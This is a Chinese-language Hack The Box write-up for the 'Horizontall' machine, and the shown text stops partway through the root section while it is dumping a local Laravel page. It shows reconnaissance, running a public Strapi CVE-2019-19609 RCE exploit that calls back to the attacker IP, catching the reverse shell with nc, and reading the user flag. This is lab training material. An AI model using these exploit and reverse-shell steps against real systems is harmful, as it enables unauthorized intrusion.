Horizontall-htb-writeup

0x00 靶场技能介绍

章节技能：js敏感信息泄露、CVE-2019-19609漏洞利用、CVE-2021-3129漏洞利用、SSH端口转发、SSH公钥写入靶机登录

参考链接：https://0xdf.gitlab.io/2022/02/05/htb-horizontall.html

参考链接：https://systemweakness.com/wriet-hack-the-box-horizontall-2c4503a87a49

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.105

2、测试下靶机连通率

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.11.105 -c 4
PING 10.10.11.105 (10.10.11.105) 56(84) bytes of data.
64 bytes from 10.10.11.105: icmp_seq=1 ttl=63 time=540 ms
64 bytes from 10.10.11.105: icmp_seq=2 ttl=63 time=299 ms
64 bytes from 10.10.11.105: icmp_seq=3 ttl=63 time=295 ms
64 bytes from 10.10.11.105: icmp_seq=4 ttl=63 time=295 ms

--- 10.10.11.105 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3006ms
rtt min/avg/max/mdev = 294.912/357.273/540.497/105.794 ms

3、测试下开放端口情况

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.105    
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-26 21:37 CST
Warning: 10.10.11.105 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.105
Host is up (0.36s latency).
Not shown: 59671 closed tcp ports (reset), 5862 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 55.57 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
22,80,                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.11.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-26 21:40 CST
Nmap scan report for 10.10.11.105
Host is up (0.30s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.87 seconds

4、这里发现了一个域名信息，本机做一下靶机hosts绑定

1
2
3

┌──(kali㉿kali)-[~/桌面]
└─$ echo '10.10.11.105 horizontall.htb' | sudo tee -a /etc/hosts
10.10.11.105 horizontall.htb

5、因为也是开放的80和22，那就继续目录扫描下，看看有什么信息泄露吧

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://horizontall.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_horizontall.htb/__23-12-26_21-47-44.txt

Target: http://horizontall.htb/

[21:47:44] Starting: 
[21:47:48] 301 -  194B  - /js  ->  http://horizontall.htb/js/               
[21:48:54] 301 -  194B  - /css  ->  http://horizontall.htb/css/             
[21:49:04] 200 -    4KB - /favicon.ico                                      
[21:49:12] 301 -  194B  - /img  ->  http://horizontall.htb/img/             
[21:49:17] 403 -  580B  - /js/ 

Task Completed

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://horizontall.htb/ --wordlist=/usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://horizontall.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/favicon.ico          (Status: 200) [Size: 4286]
/img                  (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/index.html           (Status: 200) [Size: 901]
/js                   (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

6、这里通过一系列的漏洞枚举，目录探测，各种都没有发现入口点，峰回路转，在 app.c68eb462.js 里发现了一个新的域名信息

http://horizontall.htb/js/app.c68eb462.js

					getReviews: function() {
						var t = this;
						r.a.get(
								"http://api-prod.horizontall.htb/reviews"
							)
							.then((function(s) {
								return t.reviews = s.data
							}))
					}

7、本机做下hosts靶机绑定

┌──(kali㉿kali)-[~/桌面]
└─$ echo '10.10.11.105 api-prod.horizontall.htb' | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.105 api-prod.horizontall.htb

8、访问 /reviews 路径下信息

http://api-prod.horizontall.htb/reviews

[{"id":1,"name":"wail","description":"This is good service","stars":4,"created_at":"2021-05-29T13:23:38.000Z","updated_at":"2021-05-29T13:23:38.000Z"},{"id":2,"name":"doe","description":"i'm satisfied with the product","stars":5,"created_at":"2021-05-29T13:24:17.000Z","updated_at":"2021-05-29T13:24:17.000Z"},{"id":3,"name":"john","description":"create service with minimum price i hop i can buy more in the futur","stars":5,"created_at":"2021-05-29T13:25:26.000Z","updated_at":"2021-05-29T13:25:26.000Z"}]

9、并没有什么有用的信息，继续查看下网站的首页目录

10、首页是空白，那就继续目录扫描下看看吧

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://api-prod.horizontall.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_api-prod.horizontall.htb/__23-12-26_22-15-26.txt

Target: http://api-prod.horizontall.htb/

[22:15:26] Starting: 
[22:15:54] 400 -   67B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[22:16:05] 200 -  854B  - /ADMIN                                            
[22:16:05] 200 -  854B  - /admin
[22:16:05] 200 -  854B  - /Admin
[22:16:06] 200 -  854B  - /admin/                                           
[22:16:06] 200 -  854B  - /Admin/
[22:16:06] 200 -  854B  - /admin/%3bindex/
[22:16:06] 200 -  854B  - /admin/.config
[22:16:06] 200 -  854B  - /admin/_logs/access-log
[22:16:06] 200 -  854B  - /admin/.htaccess
[22:16:06] 200 -  854B  - /admin/_logs/access_log
[22:16:06] 200 -  854B  - /admin/_logs/error_log
[22:16:06] 200 -  854B  - /admin/access_log
[22:16:06] 200 -  854B  - /admin/_logs/error-log
[22:16:06] 200 -  854B  - /admin/account                                    
[22:16:06] 200 -  854B  - /admin/admin                                      
[22:16:06] 200 -  854B  - /admin/admin-login
[22:16:07] 200 -  854B  - /admin/admin/login                                
[22:16:07] 200 -  854B  - /admin/admin_login
[22:16:07] 200 -  854B  - /admin/adminLogin                                 
[22:16:07] 200 -  854B  - /admin/controlpanel                               
[22:16:07] 200 -  854B  - /admin/backup/
[22:16:07] 200 -  854B  - /admin/backups/                                   
[22:16:07] 200 -  854B  - /admin/cp                                         
[22:16:07] 200 -  854B  - /admin/data/autosuggest                           
[22:16:07] 200 -  854B  - /admin/dumper/
[22:16:07] 200 -  854B  - /admin/error_log                                  
[22:16:07] 200 -  854B  - /admin/FCKeditor
[22:16:07] 200 -  854B  - /admin/heapdump                                   
[22:16:07] 200 -  854B  - /admin/db/                                        
[22:16:08] 200 -  854B  - /admin/default                                    
[22:16:08] 200 -  854B  - /admin/home
[22:16:08] 200 -  854B  - /admin/js/tiny_mce                                
[22:16:08] 200 -  854B  - /admin/index.html
[22:16:08] 200 -  854B  - /admin/index                                      
[22:16:08] 200 -  854B  - /admin/js/tiny_mce/                               
[22:16:08] 200 -  854B  - /admin/js/tinymce/                                
[22:16:08] 200 -  854B  - /admin/js/tinymce                                 
[22:16:08] 200 -  854B  - /admin/log
[22:16:08] 200 -  854B  - /admin/login                                      
[22:16:08] 200 -  854B  - /admin/logs/access-log
[22:16:08] 200 -  854B  - /Admin/login/
[22:16:08] 200 -  854B  - /admin/logs/
[22:16:08] 200 -  854B  - /admin/logs/access_log                            
[22:16:08] 200 -  854B  - /admin/logs/error-log                             
[22:16:09] 200 -  854B  - /admin/manage                                     
[22:16:09] 200 -  854B  - /admin/mysql/                                     
[22:16:09] 200 -  854B  - /admin/phpMyAdmin
[22:16:09] 200 -  854B  - /admin/phpmyadmin/                                
[22:16:09] 200 -  854B  - /admin/pMA/
[22:16:09] 200 -  854B  - /admin/pma/
[22:16:09] 200 -  854B  - /admin/private/logs
[22:16:09] 200 -  854B  - /admin/portalcollect.php?f=http://xxx&t=js        
[22:16:09] 200 -  854B  - /admin/logs/error_log                             
[22:16:09] 200 -  854B  - /admin/release
[22:16:09] 200 -  854B  - /admin/scripts/fckeditor
[22:16:09] 200 -  854B  - /admin/signin
[22:16:09] 200 -  854B  - /admin/sqladmin/                                  
[22:16:09] 200 -  854B  - /admin/sxd/                                       
[22:16:09] 200 -  854B  - /admin/sysadmin/
[22:16:09] 200 -  854B  - /admin/phpMyAdmin/
[22:16:09] 200 -  854B  - /admin/tiny_mce
[22:16:09] 200 -  854B  - /admin/tinymce
[22:16:09] 200 -  854B  - /admin/web/                                       
[22:16:09] 200 -  854B  - /admin/views/ajax/autocomplete/user/a             
[22:16:57] 200 -    1KB - /favicon.ico                                      
[22:17:49] 200 -  507B  - /reviews                                          
[22:17:49] 200 -  121B  - /robots.txt                                       
[22:18:16] 403 -   60B  - /users                                            
[22:18:17] 403 -   60B  - /users/admin                                      
[22:18:17] 403 -   60B  - /users/login.jsp
[22:18:17] 403 -   60B  - /users/login.html
[22:18:17] 403 -   60B  - /users/login
[22:18:17] 403 -   60B  - /users/login.php
[22:18:17] 403 -   60B  - /users/login.aspx
[22:18:17] 403 -   60B  - /users/admin.php                                  
[22:18:17] 403 -   60B  - /users/login.js                                   
[22:18:17] 403 -   60B  - /users/

Task Completed

11、发现了一个登录页面，strapi 的一个框架网站

12、通过检索，在以下一个参考文章中发现了涉及具体版本信息的路径地址，并获取到了当前这个网站的版本号信息

https://thatsn0tmysite.wordpress.com/2019/11/15/x05/

1
2
3

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://api-prod.horizontall.htb/admin/strapiVersion   
{"strapiVersion":"3.0.0-beta.17.4"}

13、通过谷歌检索，发现了一个结合型的漏洞利用工具

https://github.com/glowbase/CVE-2019-19609/blob/main/exploit.py

此漏洞利用的目标是 Strapi CMS Framework 版本3.0.0-beta-17.4中的两个漏洞，允许未经身份验证的远程代码执行 (RCE)。

CVE-2019-18818
忘记密码的弱密码恢复机制

CVSS：9.8 - 严重

更多详细信息：https://nvd.nist.gov/vuln/detail/CVE-2019-18818

CVE-2019-19609
操作系统命令中使用的特殊元素的不正确中和（“操作系统命令注入”）

CVSS：7.2 - 高

更多详细信息：https://nvd.nist.gov/vuln/detail/CVE-2019-19609

14、然后我们下载开漏洞利用工具进行漏洞利用

┌──(kali㉿kali)-[~/桌面]
└─$ touch exploit.py

┌──(kali㉿kali)-[~/桌面]
└─$ python3 exploit.py http://api-prod.horizontall.htb 10.10.14.2 443
========================================================
|    STRAPI REMOTE CODE EXECUTION (CVE-2019-19609)     |
========================================================
[+] Checking Strapi CMS version
[+] Looks like this exploit should work!
[+] Executing exploit

15、这边成功收到监听的结果

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.105] 49878
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)

16、根据查看这个获取的用户的名称，我们直接获取到了第一个flag信息

$ ls -la /home/
total 12
drwxr-xr-x  3 root      root      4096 May 25  2021 .
drwxr-xr-x 24 root      root      4096 Aug 23  2021 ..
drwxr-xr-x  8 developer developer 4096 Aug  2  2021 developer
$ ls -la /home/developer
total 108
drwxr-xr-x  8 developer developer  4096 Aug  2  2021 .
drwxr-xr-x  3 root      root       4096 May 25  2021 ..
lrwxrwxrwx  1 root      root          9 Aug  2  2021 .bash_history -> /dev/null
-rw-r-----  1 developer developer   242 Jun  1  2021 .bash_logout
-rw-r-----  1 developer developer  3810 Jun  1  2021 .bashrc
drwx------  3 developer developer  4096 May 26  2021 .cache
-rw-rw----  1 developer developer 58460 May 26  2021 composer-setup.php
drwx------  5 developer developer  4096 Jun  1  2021 .config
drwx------  3 developer developer  4096 May 25  2021 .gnupg
drwxrwx---  3 developer developer  4096 May 25  2021 .local
drwx------ 12 developer developer  4096 May 26  2021 myproject
-rw-r-----  1 developer developer   807 Apr  4  2018 .profile
drwxrwx---  2 developer developer  4096 Jun  4  2021 .ssh
-r--r--r--  1 developer developer    33 Dec 26 13:36 user.txt
lrwxrwxrwx  1 root      root          9 Aug  2  2021 .viminfo -> /dev/null
$ cat /home/developer/user.txt
2eebcc56232c8e60a8645d8b83b3ebd3
$

0x02 系统权限获取

17、通过信息枚举，查看srtapi的目录，发现并没有什么有用的信息获取

$ pwd
/opt/strapi/myapi
$ ls -la
total 648
drwxr-xr-x    9 strapi strapi   4096 Jul 29  2021 .
drwxr-xr-x    9 strapi strapi   4096 Aug  2  2021 ..
drwxr-xr-x    3 strapi strapi   4096 May 29  2021 api
drwxrwxr-x    2 strapi strapi  12288 May 26  2021 build
drwxrwxr-x    5 strapi strapi   4096 May 26  2021 .cache
drwxr-xr-x    5 strapi strapi   4096 Jul 29  2021 config
-rw-r--r--    1 strapi strapi    249 May 26  2021 .editorconfig
-rw-r--r--    1 strapi strapi     32 May 26  2021 .eslintignore
-rw-r--r--    1 strapi strapi    541 May 26  2021 .eslintrc
drwxr-xr-x    3 strapi strapi   4096 May 26  2021 extensions
-rw-r--r--    1 strapi strapi   1150 May 26  2021 favicon.ico
-rw-r--r--    1 strapi strapi   1119 May 26  2021 .gitignore
drwxrwxr-x 1099 strapi strapi  36864 Aug  3  2021 node_modules
-rw-rw-r--    1 strapi strapi   1009 May 26  2021 package.json
-rw-rw-r--    1 strapi strapi 552845 May 26  2021 package-lock.json
drwxr-xr-x    3 strapi strapi   4096 Jun  2  2021 public
-rw-r--r--    1 strapi strapi     69 May 26  2021 README.md
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
strapi@horizontall:~/myapi$

18、但是通过查看开放端口情况，发现了一个 8000 的端口信息

strapi@horizontall:~/myapi$ ss -tl
ss -tl
State    Recv-Q    Send-Q        Local Address:Port        Peer Address:Port    
LISTEN   0         128                 0.0.0.0:http             0.0.0.0:*       
LISTEN   0         128                 0.0.0.0:ssh              0.0.0.0:*       
LISTEN   0         128               127.0.0.1:1337             0.0.0.0:*       
LISTEN   0         128               127.0.0.1:8000             0.0.0.0:*       
LISTEN   0         80                127.0.0.1:mysql            0.0.0.0:*       
LISTEN   0         128                    [::]:http                [::]:*       
LISTEN   0         128                    [::]:ssh                 [::]:*

19、使用 curl 查看这个网站的信息

strapi@horizontall:~/myapi$ curl 127.0.0.1:8000
curl 127.0.0.1:8000
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">

        <title>Laravel</title>

        <!-- Fonts -->
        <link href="https://fonts.googleapis.com/css2?family=Nunito:wght@400;600;700&display=swap" rel="stylesheet">

        <!-- Styles -->
        <style>
            /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}svg,video{display:block;vertical-align:middle}video{max-width:100%;height:auto}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity))}.bg-gray-100{--bg-opacity:1;background-color:#f7fafc;background-color:rgba(247,250,252,var(--bg-opacity))}.border-gray-200{--border-opacity:1;border-color:#edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-t{border-top-width:1px}.flex{display:flex}.grid{display:grid}.hidden{display:none}.items-center{align-items:center}.justify-center{justify-content:center}.font-semibold{font-weight:600}.h-5{height:1.25rem}.h-8{height:2rem}.h-16{height:4rem}.text-sm{font-size:.875rem}.text-lg{font-size:1.125rem}.leading-7{line-height:1.75rem}.mx-auto{margin-left:auto;margin-right:auto}.ml-1{margin-left:.25rem}.mt-2{margin-top:.5rem}.mr-2{margin-right:.5rem}.ml-2{margin-left:.5rem}.mt-4{margin-top:1rem}.ml-4{margin-left:1rem}.mt-8{margin-top:2rem}.ml-12{margin-left:3rem}.-mt-px{margin-top:-1px}.max-w-6xl{max-width:72rem}.min-h-screen{min-height:100vh}.overflow-hidden{overflow:hidden}.p-6{padding:1.5rem}.py-4{padding-top:1rem;padding-bottom:1rem}.px-6{padding-left:1.5rem;padding-right:1.5rem}.pt-8{padding-top:2rem}.fixed{position:fixed}.relative{position:relative}.top-0{top:0}.right-0{right:0}.shadow{box-shadow:0 1px 3px 0 rgba(0,0,0,.1),0 1px 2px 0 rgba(0,0,0,.06)}.text-center{text-align:center}.text-gray-200{--text-opacity:1;color:#edf2f7;color:rgba(237,242,247,var(--text-opacity))}.text-gray-300{--text-opacity:1;color:#e2e8f0;color:rgba(226,232,240,var(--text-opacity))}.text-gray-400{--text-opacity:1;color:#cbd5e0;color:rgba(203,213,224,var(--text-opacity))}.text-gray-500{--text-opacity:1;color:#a0aec0;color:rgba(160,174,192,var(--text-opacity))}.text-gray-600{--text-opacity:1;color:#718096;color:rgba(113,128,150,var(--text-opacity))}.text-gray-700{--text-opacity:1;color:#4a5568;color:rgba(74,85,104,var(--text-opacity))}.text-gray-900{--text-opacity:1;color:#1a202c;color:rgba(26,32,44,var(--text-opacity))}.underline{text-decoration:underline}.antialiased{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.w-5{width:1.25rem}.w-8{width:2rem}.w-auto{width:auto}.grid-cols-1{grid-template-columns:repeat(1,minmax(0,1fr))}@media (min-width:640px){.sm\:rounded-lg{border-radius:.5rem}.sm\:block{display:block}.sm\:items-center{align-items:center}.sm\:justify-start{justify-content:flex-start}.sm\:justify-between{justify-content:space-between}.sm\:h-20{height:5rem}.sm\:ml-0{margin-left:0}.sm\:px-6{padding-left:1.5rem;padding-right:1.5rem}.sm\:pt-0{padding-top:0}.sm\:text-left{text-align:left}.sm\:text-right{text-align:right}}@media (min-width:768px){.md\:border-t-0{border-top-width:0}.md\:border-l{border-left-width:1px}.md\:grid-cols-2{grid-template-columns:repeat(2,minmax(0,1fr))}}@media (min-width:1024px){.lg\:px-8{padding-left:2rem;padding-right:2rem}}@media (prefers-color-scheme:dark){.dark\:bg-gray-800{--bg-opacity:1;background-color:#2d3748;background-color:rgba(45,55,72,var(--bg-opacity))}.dark\:bg-gray-900{--bg-opacity:1;background-color:#1a202c;background-color:rgba(26,32,44,var(--bg-opacity))}.dark\:border-gray-700{--border-opacity:1;border-color:#4a5568;border-color:rgba(74,85,104,var(--border-opacity))}.dark\:text-white{--text-opacity:1;color:#fff;color:rgba(255,255,255,var(--text-opacity))}.dark\:text-gray-400{--text-opacity:1;color:#cbd5e0;color:rgba(203,213,224,var(--text-opacity))}}
        </style>

        <style>
            body {
                font-family: 'Nunito';
            }
        </style>
    </head>
    <body class="antialiased">
        <div class="relative flex items-top justify-center min-h-screen bg-gray-100 dark:bg-gray-900 sm:items-center sm:pt-0">
            
            <div class="max-w-6xl mx-auto sm:px-6 lg:px-8">
                <div class="flex justify-center pt-8 sm:justify-start sm:pt-0">
                    <svg viewBox="0 0 651 192" fill="none" xmlns="http://www.w3.org/2000/svg" class="h-16 w-auto text-gray-700 sm:h-20">
                        <g clip-path="url(#clip0)" fill="#EF3B2D">
                            <path d="M248.032 44.676h-16.466v100.23h47.394v-14.748h-30.928V44.676zM337.091 87.202c-2.101-3.341-5.083-5.965-8.949-7.875-3.865-1.909-7.756-2.864-11.669-2.864-5.062 0-9.69.931-13.89 2.792-4.201 1.861-7.804 4.417-10.811 7.661-3.007 3.246-5.347 6.993-7.016 11.239-1.672 4.249-2.506 8.713-2.506 13.389 0 4.774.834 9.26 2.506 13.459 1.669 4.202 4.009 7.925 7.016 11.169 3.007 3.246 6.609 5.799 10.811 7.66 4.199 1.861 8.828 2.792 13.89 2.792 3.913 0 7.804-.955 11.669-2.863 3.866-1.908 6.849-4.533 8.949-7.875v9.021h15.607V78.182h-15.607v9.02zm-1.431 32.503c-.955 2.578-2.291 4.821-4.009 6.73-1.719 1.91-3.795 3.437-6.229 4.582-2.435 1.146-5.133 1.718-8.091 1.718-2.96 0-5.633-.572-8.019-1.718-2.387-1.146-4.438-2.672-6.156-4.582-1.719-1.909-3.032-4.152-3.938-6.73-.909-2.577-1.36-5.298-1.36-8.161 0-2.864.451-5.585 1.36-8.162.905-2.577 2.219-4.819 3.938-6.729 1.718-1.908 3.77-3.437 6.156-4.582 2.386-1.146 5.059-1.718 8.019-1.718 2.958 0 5.656.572 8.091 1.718 2.434 1.146 4.51 2.674 6.229 4.582 1.718 1.91 3.054 4.152 4.009 6.729.953 2.577 1.432 5.298 1.432 8.162-.001 2.863-.479 5.584-1.432 8.161zM463.954 87.202c-2.101-3.341-5.083-5.965-8.949-7.875-3.865-1.909-7.756-2.864-11.669-2.864-5.062 0-9.69.931-13.89 2.792-4.201 1.861-7.804 4.417-10.811 7.661-3.007 3.246-5.347 6.993-7.016 11.239-1.672 4.249-2.506 8.713-2.506 13.389 0 4.774.834 9.26 2.506 13.459 1.669 4.202 4.009 7.925 7.016 11.169 3.007 3.246 6.609 5.799 10.811 7.66 4.199 1.861 8.828 2.792 13.89 2.792 3.913 0 7.804-.955 11.669-2.863 3.866-1.908 6.849-4.533 8.949-7.875v9.021h15.607V78.182h-15.607v9.02zm-1.432 32.503c-.955 2.578-2.291 4.821-4.009 6.73-1.719 1.91-3.795 3.437-6.229 4.582-2.435 1.146-5.133 1.718-8.091 1.718-2.96 0-5.633-.572-8.019-1.718-2.387-1.146-4.438-2.672-6.156-4.582-1.719-1.909-3.032-4.152-3.938-6.73-.909-2.577-1.36-5.298-1.36-8.161 0-2.864.451-5.585 1.36-8.162.905-2.577 2.219-4.819 3.938-6.729 1.718-1.908 3.77-3.437 6.156-4.582 2.386-1.146 5.059-1.718 8.019-1.718 2.958 0 5.656.572 8.091 1.718 2.434 1.146 4.51 2.674 6.229 4.582 1.718 1.91 3.054 4.152 4.009 6.729.953 2.577 1.432 5.298 1.432 8.162 0 2.863-.479 5.584-1.432 8.161zM650.772 44.676h-15.606v100.23h15.606V44.676zM365.013 144.906h15.607V93.538h26.776V78.182h-42.383v66.724zM542.133 78.182l-19.616 51.096-19.616-51.096h-15.808l25.617 66.724h19.614l25.617-66.724h-15.808zM591.98 76.466c-19.112 0-34.239 15.706-34.239 35.079 0 21.416 14.641 35.079 36.239 35.079 12.088 0 19.806-4.622 29.234-14.688l-10.544-8.158c-.006.008-7.958 10.449-19.832 10.449-13.802 0-19.612-11.127-19.612-16.884h51.777c2.72-22.043-11.772-40.877-33.023-40.877zm-18.713 29.28c.12-1.284 1.917-16.884 18.589-16.884 16.671 0 18.697 15.598 18.813 16.884h-37.402zM184.068 43.892c-.024-.088-.073-.165-.104-.25-.058-.157-.108-.316-.191-.46-.056-.097-.137-.176-.203-.265-.087-.117-.161-.242-.265-.345-.085-.086-.194-.148-.29-.223-.109-.085-.206-.182-.327-.252l-.002-.001-.002-.002-35.648-20.524a2.971 2.971 0 00-2.964 0l-35.647 20.522-.002.002-.002.001c-.121.07-.219.167-.327.252-.096.075-.205.138-.29.223-.103.103-.178.228-.265.345-.066.089-.147.169-.203.265-.083.144-.133.304-.191.46-.031.085-.08.162-.104.25-.067.249-.103.51-.103.776v38.979l-29.706 17.103V24.493a3 3 0 00-.103-.776c-.024-.088-.073-.165-.104-.25-.058-.157-.108-.316-.191-.46-.056-.097-.137-.176-.203-.265-.087-.117-.161-.242-.265-.345-.085-.086-.194-.148-.29-.223-.109-.085-.206-.182-.327-.252l-.002-.001-.002-.002L40.098 1.396a2.971 2.971 0 00-2.964 0L1.487 21.919l-.002.002-.002.001c-.121.07-.219.167-.327.252-.096.075-.205.138-.29.223-.103.103-.178.228-.265.345-.066.089-.147.169-.203.265-.083.144-.133.304-.191.46-.031.085-.08.162-.104.25-.067.249-.103.51-.103.776v122.09c0 1.063.568 2.044 1.489 2.575l71.293 41.045c.156.089.324.143.49.202.078.028.15.074.23.095a2.98 2.98 0 001.524 0c.069-.018.132-.059.2-.083.176-.061.354-.119.519-.214l71.293-41.045a2.971 2.971 0 001.489-2.575v-38.979l34.158-19.666a2.971 2.971 0 001.489-2.575V44.666a3.075 3.075 0 00-.106-.774zM74.255 143.167l-29.648-16.779 31.136-17.926.001-.001 34.164-19.669 29.674 17.084-21.772 12.428-43.555 24.863zm68.329-76.259v33.841l-12.475-7.182-17.231-9.92V49.806l12.475 7.182 17.231 9.92zm2.97-39.335l29.693 17.095-29.693 17.095-29.693-17.095 29.693-17.095zM54.06 114.089l-12.475 7.182V46.733l17.231-9.92 12.475-7.182v74.537l-17.231 9.921zM38.614 7.398l29.693 17.095-29.693 17.095L8.921 24.493 38.614 7.398zM5.938 29.632l12.475 7.182 17.231 9.92v79.676l.001.005-.001.006c0 .114.032.221.045.333.017.146.021.294.059.434l.002.007c.032.117.094.222.14.334.051.124.088.255.156.371a.036.036 0 00.004.009c.061.105.149.191.222.288.081.105.149.22.244.314l.008.01c.084.083.19.142.284.215.106.083.202.178.32.247l.013.005.011.008 34.139 19.321v34.175L5.939 144.867V29.632h-.001zm136.646 115.235l-65.352 37.625V148.31l48.399-27.628 16.953-9.677v33.862zm35.646-61.22l-29.706 17.102V66.908l17.231-9.92 12.475-7.182v33.841z"/>
                        </g>
                    </svg>
                </div>

                <div class="mt-8 bg-white dark:bg-gray-800 overflow-hidden shadow sm:rounded-lg">
                    <div class="grid grid-cols-1 md:grid-cols-2">
                        <div class="p-6">
                            <div class="flex items-center">
                                <svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="w-8 h-8 text-gray-500"><path d="M12 6.253v13m0-13C10.832 5.477 9.246 5 7.5 5S4.168 5.477 3 6.253v13C4.168 18.477 5.754 18 7.5 18s3.332.477 4.5 1.253m0-13C13.168 5.477 14.754 5 16.5 5c1.747 0 3.332.477 4.5 1.253v13C19.832 18.477 18.247 18 16.5 18c-1.746 0-3.332.477-4.5 1.253"></path></svg>
                                <div class="ml-4 text-lg leading-7 font-semibold"><a href="https://laravel.com/docs" class="underline text-gray-900 dark:text-white">Documentation</a></div>
                            </div>

                            <div class="ml-12">
                                <div class="mt-2 text-gray-600 dark:text-gray-400 text-sm">
                                    Laravel has wonderful, thorough documentation covering every aspect of the framework. Whether you are new to the framework or have previous experience with Laravel, we recommend reading all of the documentation from beginning to end.
                                </div>
                            </div>
                        </div>

                        <div class="p-6 border-t border-gray-200 dark:border-gray-700 md:border-t-0 md:border-l">
                            <div class="flex items-center">
                                <svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="w-8 h-8 text-gray-500"><path d="M3 9a2 2 0 012-2h.93a2 2 0 001.664-.89l.812-1.22A2 2 0 0110.07 4h3.86a2 2 0 011.664.89l.812 1.22A2 2 0 0018.07 7H19a2 2 0 012 2v9a2 2 0 01-2 2H5a2 2 0 01-2-2V9z"></path><path d="M15 13a3 3 0 11-6 0 3 3 0 016 0z"></path></svg>
                                <div class="ml-4 text-lg leading-7 font-semibold"><a href="https://laracasts.com" class="underline text-gray-900 dark:text-white">Laracasts</a></div>
                            </div>

                            <div class="ml-12">
                                <div class="mt-2 text-gray-600 dark:text-gray-400 text-sm">
                                    Laracasts offers thousands of video tutorials on Laravel, PHP, and JavaScript development. Check them out, see for yourself, and massively level up your development skills in the process.
                                </div>
                            </div>
                        </div>

                        <div class="p-6 border-t border-gray-200 dark:border-gray-700">
                            <div class="flex items-center">
                                <svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="w-8 h-8 text-gray-500"><path d="M7 8h10M7 12h4m1 8l-4-4H5a2 2 0 01-2-2V6a2 2 0 012-2h14a2 2 0 012 2v8a2 2 0 01-2 2h-3l-4 4z"></path></svg>
